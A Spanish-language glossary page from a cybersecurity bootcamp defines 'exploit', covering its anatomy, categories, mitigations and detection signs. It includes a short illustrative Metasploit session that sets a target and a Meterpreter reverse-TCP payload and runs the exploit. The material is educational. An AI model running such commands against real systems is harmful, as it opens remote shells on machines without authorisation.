Saltar al contenido

Próxima edición 6 de julio de 2026

Seguridad ofensiva

Exploit

Pieza de código, secuencia de comandos o técnica que aprovecha una vulnerabilidad en software, hardware o comportamiento humano para causar consecuencias no deseadas como ejecución remota de código, elevación de privilegios, denegación de servicio o divulgación de información.

Autor
Unihackers Team
Tiempo de lectura
2 min de lectura
Última actualización

Por Qué Importa

Cada ataque significativo convierte en algún momento una vulnerabilidad en impacto, y esa conversión es el trabajo de un exploit. Entenderlos es esencial para practicantes ofensivos, defensores que los detectan e ingenieros que construyen software resistente.

WannaCry (2017) usó EternalBlue (CVE-2017-0144) para propagarse a millones de sistemas. ProxyLogon (2021) comprometió decenas de miles de organizaciones. La oleada de explotación de Ivanti Connect Secure en 2024 mostró cuán rápido se arma el código de exploit tras la divulgación.

Anatomía de un Exploit

Trigger Inicial

Se alcanza la ruta de código vulnerable, a menudo mediante entrada manipulada que viola invariantes asumidas.

Construcción de Primitivas

Los exploits de corrupción de memoria encadenan primitivas como lectura/escritura arbitraria y fugas de información.

Ejecución de Código

Una vez secuestrado el control, el exploit ejecuta código del atacante: shellcode, cargadores reflectivos, cadenas ROP.

Post-Explotación

Persistencia, elevación de privilegios, movimiento lateral o entrega de payload, a menudo con malware escenificado por separado.

Categorías

CategoríaObjetivoEjemplos
Corrupción de memoriaProgramas C/C++Buffer overflow, UAF, type confusion
Aplicación webServicios HTTPSQLi, XSS, SSRF, deserialización
LógicosSemántica de aplicaciónBypass auth, IDOR, race conditions
CriptográficosImplementaciones criptoPadding oracle, RNG débil
HardwareCPU/firmwareSpectre, Meltdown, Rowhammer
Ingeniería socialHumanosPhishing

Frameworks

ejemplo-msf.sh
Bash
# Ejemplo Metasploit
msfconsole
> search type:exploit cve:2024
> use exploit/multi/http/ejemplo_rce
> set RHOSTS 10.0.0.5
> set LHOST 10.0.0.10
> set PAYLOAD windows/x64/meterpreter/reverse_tcp
> run
  • Metasploit Framework
  • Cobalt Strike
  • Sliver (open-source C2)
  • pwntools
  • GDB / pwndbg / WinDbg

Mitigaciones

  1. Gestión de parches centrada en CISA KEV.
  2. Lenguajes seguros en memoria (Rust, Go).
  3. Mitigaciones del SO y compilador.
  4. EDR con prevención de exploits.
  5. Sandboxing de aplicaciones.
  6. Segmentación de red.
  7. Mínimo privilegio.

Detección

  • Procesos hijos inesperados de navegadores u Office
  • Inyección de DLL o actividad sospechosa en memoria
  • Binarios sin firmar desde rutas escribibles
  • Beaconing anómalo post-explotación

Conceptos Relacionados

En el Bootcamp

Cómo enseñamos Exploit

En nuestro Cybersecurity Bootcamp, no solo aprenderás sobre Exploit en teoría. Practicarás con herramientas reales en laboratorios prácticos, guiado por profesionales de la industria que usan estos conceptos a diario.

Cubierto en:

Módulo 10: Pentesting y Hacking Ético

Temas relacionados que dominarás:MetasploitNmapBurp SuiteEscalada de Privilegios
Ver Cómo enseñamos esto

360+ horas de formación experta • CompTIA Security+ incluido